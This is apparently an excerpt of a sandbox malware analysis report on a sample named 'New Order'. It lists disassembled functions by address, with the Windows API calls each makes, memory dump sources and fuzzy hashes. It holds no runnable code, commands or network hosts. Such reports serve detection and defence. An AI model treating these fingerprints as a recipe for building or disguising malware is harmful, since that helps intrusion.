PostMessageW.USER32(00000001,00000201,00000001), ref: 003219C1
Sleep.KERNEL32(00000000,?,?,?), ref: 003219C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 003219DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 003219E2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f6b985e9e529c827e4918bb77b3afdf82f7699c9b798b51d2891447a36a02158
Instruction ID: d511f6ce6468b68dd52d043fd2b7cadda7727e9065e63a00886ecd87503e8f71
Opcode Fuzzy Hash: f6b985e9e529c827e4918bb77b3afdf82f7699c9b798b51d2891447a36a02158
Instruction Fuzzy Hash: EA31D471A00329EFCB01CFA8DE99ADE7BB9EB14315F104225F921A72D1C7709E84CB90

Function 00355706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00355745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0035579D
_wcslen.LIBCMT ref: 003557AF
_wcslen.LIBCMT ref: 003557BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00355816

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 7f645a524933dc177a8e813af64db240ebb28cd3b3813fd8510cb42dacfde3f5
Instruction ID: b4502ebe6cc76d0b77a039c2aa056aad3c332c6a98b9102c68924bf7a0000c41
Opcode Fuzzy Hash: 7f645a524933dc177a8e813af64db240ebb28cd3b3813fd8510cb42dacfde3f5
Instruction Fuzzy Hash: 2021A771904618DADB229FA1CC44EEDB7BCFF04326F104156ED19EA1A0D7709989CF50

Function 00340930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00340951
GetForegroundWindow.USER32 ref: 00340968
GetDC.USER32(00000000), ref: 003409A4
GetPixel.GDI32(00000000,?,00000003), ref: 003409B0
ReleaseDC.USER32(00000000,00000003), ref: 003409E8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2a346a231213c65e4c93da4c502c02c030790adf979310ee7e79febe83e80df9
Instruction ID: d7d90ee511ab785478a9812ff675e30814b3b68321d1ef8059662a97b90cd1a7
Opcode Fuzzy Hash: 2a346a231213c65e4c93da4c502c02c030790adf979310ee7e79febe83e80df9
Instruction Fuzzy Hash: 38218E35610214AFD705EF65C885AAEBBE9EF48745F04846DE84A9B772CB30AD04CB50

Function 002FCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 002FCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002FCDE9

Part of subcall function 002F3820: RtlAllocateHeap.NTDLL(00000000,?,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6,?,002C1129), ref: 002F3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002FCE0F
_free.LIBCMT ref: 002FCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002FCE31

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ee9831eca8e04bb3d786f4b6740a1f8b35f43b3cf490ac183c86c6918fbfee43
Instruction ID: 538269f02d1be16cd651bee90357a54f6cf144294b979163c29d20c86854327c
Opcode Fuzzy Hash: ee9831eca8e04bb3d786f4b6740a1f8b35f43b3cf490ac183c86c6918fbfee43
Instruction Fuzzy Hash: A101D872A2171E7F23211A766D48CBBE96DDEC6BE13250139FE05C7210DA658D2181F0

Function 002D9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D9693
SelectObject.GDI32(?,00000000), ref: 002D96A2
BeginPath.GDI32(?), ref: 002D96B9
SelectObject.GDI32(?,00000000), ref: 002D96E2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 74c646b7972259515a9f45616b1ff2b54704b0aebb6a11763b8d1eb683f27ecb
Instruction ID: 9a38254d746f7ad514c2f6547c30d37ebe55ed068f3a6c4e88e4cec2670e975d
Opcode Fuzzy Hash: 74c646b7972259515a9f45616b1ff2b54704b0aebb6a11763b8d1eb683f27ecb
Instruction Fuzzy Hash: C7213A71822306EFDB139F69EC187A97BACBB50356F104217F411A62B0D3729DA1CBD4

Function 00325711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00325726
_memcmp.LIBVCRUNTIME ref: 00325744
_memcmp.LIBVCRUNTIME ref: 00325757
_memcmp.LIBVCRUNTIME ref: 0032576F
_memcmp.LIBVCRUNTIME ref: 00325787

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32f2f61cc4c782f99f5ad0085b2ed60e3fb3e9a1da6660ac02c21e0a0832ad54
Instruction ID: 83cfc65c2b68fa339040c3155fecbf81123aa6b04ec549b77c830a761513923b
Opcode Fuzzy Hash: 32f2f61cc4c782f99f5ad0085b2ed60e3fb3e9a1da6660ac02c21e0a0832ad54
Instruction Fuzzy Hash: 4601B5716C1A69FFD20A9519AE82FFB735C9B313A5F404030FD049A645F770EE2486A0

Function 002F2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,002EF2DE,002F3863,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6), ref: 002F2DFD
_free.LIBCMT ref: 002F2E32
_free.LIBCMT ref: 002F2E59
SetLastError.KERNEL32(00000000,002C1129), ref: 002F2E66
SetLastError.KERNEL32(00000000,002C1129), ref: 002F2E6F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c1aee918fa517d1c744d20e9512669fa0f3ab2b57d3a0e3873dd7e6eca70ee6f
Instruction ID: f0feb976f06f844348ab9f80b28085045337fdf2a980c1fcce04dfac61907e8e
Opcode Fuzzy Hash: c1aee918fa517d1c744d20e9512669fa0f3ab2b57d3a0e3873dd7e6eca70ee6f
Instruction Fuzzy Hash: 8301493627070DEBC6136B746C45D3BA95DABC37E5B301035FB20921A3EAB49C384920

Function 0032000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?,?,0032035E), ref: 0032002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?), ref: 00320046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?), ref: 00320054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?), ref: 00320064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0031FF41,80070057,?,?), ref: 00320070

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0ae5b91e2f3e0ab009cb6bf5a463ed62740d84558a3d411666284d66e469d36f
Instruction ID: 57b8a9a9534c721492de1a318706a355b1497c54471e4781f4d2db826f78626b
Opcode Fuzzy Hash: 0ae5b91e2f3e0ab009cb6bf5a463ed62740d84558a3d411666284d66e469d36f
Instruction Fuzzy Hash: F201FD72610324BFEB124F68EC44BAE7AEDEF44796F108024F805D2221E770CD048BA0

Function 0032E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0032E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0032E9A5
Sleep.KERNEL32(00000000), ref: 0032E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0032E9B7
Sleep.KERNEL32 ref: 0032E9F3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 4ae43e14107f6885ddddac483b067f394c2385a689ee175ada1e4a9093fb9ac2
Instruction ID: e3a9664420be963360da37143f68a10969aadede49f5a114ad56ce4a34d13c6b
Opcode Fuzzy Hash: 4ae43e14107f6885ddddac483b067f394c2385a689ee175ada1e4a9093fb9ac2
Instruction Fuzzy Hash: 46011B31C11639DBCF02ABE5E85A6DDBB7CBB09705F010556E502B2251CB389694C7A1

Function 003210F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00321114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 0032112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00320B9B,?,?,?), ref: 00321136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032114D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: be013646470b4e19077be6af1d54aa4d8aee7b49652a89d26ffdbbc613f0a362
Instruction ID: f357d30017fd0d2f779fd146f8fe14396f85dba8aed8ad5f7ca6e9d287e5254c
Opcode Fuzzy Hash: be013646470b4e19077be6af1d54aa4d8aee7b49652a89d26ffdbbc613f0a362
Instruction Fuzzy Hash: 3E016979200315BFDB124FA4EC49A6A3FAEEF893A5F210418FA41D3360EA31DD10CA60

Function 00320FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00320FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00320FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00320FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00320FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00321002

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b0543811f62dcff27469826b55800a1de7fc2331005f88b04af6ad1f000a8e14
Instruction ID: 8a4791bab688deb572e66561d86bc975def5eaf93e71e8b6b3baab41f7afe9f5
Opcode Fuzzy Hash: b0543811f62dcff27469826b55800a1de7fc2331005f88b04af6ad1f000a8e14
Instruction Fuzzy Hash: 55F06D39210315EFDB224FA5ED4DF5A3BADEF89766F114414FA46C72A1CA70DC80CA60

Function 00321014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0032102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00321036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00321045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0032104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00321062

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0fefbacc9add4353166a4d2d46fc643b347c29eb6dec777b7688b87fc6c7b82e
Instruction ID: a2fd0eeebe5367e893e359b2da478df91eabf9a50afee4705e7bb3cd46bff43a
Opcode Fuzzy Hash: 0fefbacc9add4353166a4d2d46fc643b347c29eb6dec777b7688b87fc6c7b82e
Instruction Fuzzy Hash: CEF0CD39210315EFDB231FA5EC48F5A3BADEF89766F114414FA06C72A0CA30D980CA60

Function 0033030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 00330324
CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 00330331
CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 0033033E
CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 0033034B
CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 00330358
CloseHandle.KERNEL32(?,?,?,?,0033017D,?,003332FC,?,00000001,00302592,?), ref: 00330365

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 49c94f9469d55536507af2809f58540f23cb034ccb258f3ecdced73210f33c4c
Instruction ID: 4051666ad58d3dc613d666ab124a015953bca42a83a1039643d2c22612242d3e
Opcode Fuzzy Hash: 49c94f9469d55536507af2809f58540f23cb034ccb258f3ecdced73210f33c4c
Instruction Fuzzy Hash: 02019076800B159FC7369F66D8D0416F7F9BF503257168A3ED19652931C371A994CE80

Function 002FD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002FD752

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002FD764
_free.LIBCMT ref: 002FD776
_free.LIBCMT ref: 002FD788
_free.LIBCMT ref: 002FD79A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 15847d5b2314d5c69138a947bfcb9ef856929481f1a7d4fe2f4fc11a09227f62
Instruction ID: befde5d80caf94ce34cf531c97f60861fadbd3cba041aff3e03c73eed37cb67e
Opcode Fuzzy Hash: 15847d5b2314d5c69138a947bfcb9ef856929481f1a7d4fe2f4fc11a09227f62
Instruction Fuzzy Hash: C8F01D325B020EEB8611BB64F981C26F7DEBB05390BA41865F244DB511C730F8508A70

Function 00325C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00325C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00325C6F
MessageBeep.USER32(00000000), ref: 00325C87
KillTimer.USER32(?,0000040A), ref: 00325CA3
EndDialog.USER32(?,00000001), ref: 00325CBD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 689550f90939fd7883207f5a936bc4c467c09a73d0d613b64817e3dfa7d32a13
Instruction ID: 4840c0d891ae6ceaad0bb9dc906c1212c39b5575ae3bf61631145ede156bfcf8
Opcode Fuzzy Hash: 689550f90939fd7883207f5a936bc4c467c09a73d0d613b64817e3dfa7d32a13
Instruction Fuzzy Hash: D3013B305107249FEB265B10ED4EF9577BCBB04B06F051559A583614F1E7F46B548A50

Function 002F22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002F22BE

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002F22D0
_free.LIBCMT ref: 002F22E3
_free.LIBCMT ref: 002F22F4
_free.LIBCMT ref: 002F2305

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5b6a4339e8646d734469e7553d266d52f510899c48df8206001c64521cccea14
Instruction ID: 034995a502476f1e67a3911450d2d439880138d101aca44b28d3c6484f296574
Opcode Fuzzy Hash: 5b6a4339e8646d734469e7553d266d52f510899c48df8206001c64521cccea14
Instruction Fuzzy Hash: 67F090714A0216CB8B13BF54BC018287B6CB7197A0F102567F511D7271C73209219FA5

Function 002D95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002D95D4
StrokeAndFillPath.GDI32(?,?,003171F7,00000000,?,?,?), ref: 002D95F0
SelectObject.GDI32(?,00000000), ref: 002D9603
DeleteObject.GDI32 ref: 002D9616
StrokePath.GDI32(?), ref: 002D9631

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 191fc493a7813d993a78e29812047ab028e3e7cc1d002fd39627f07e8405a9f3
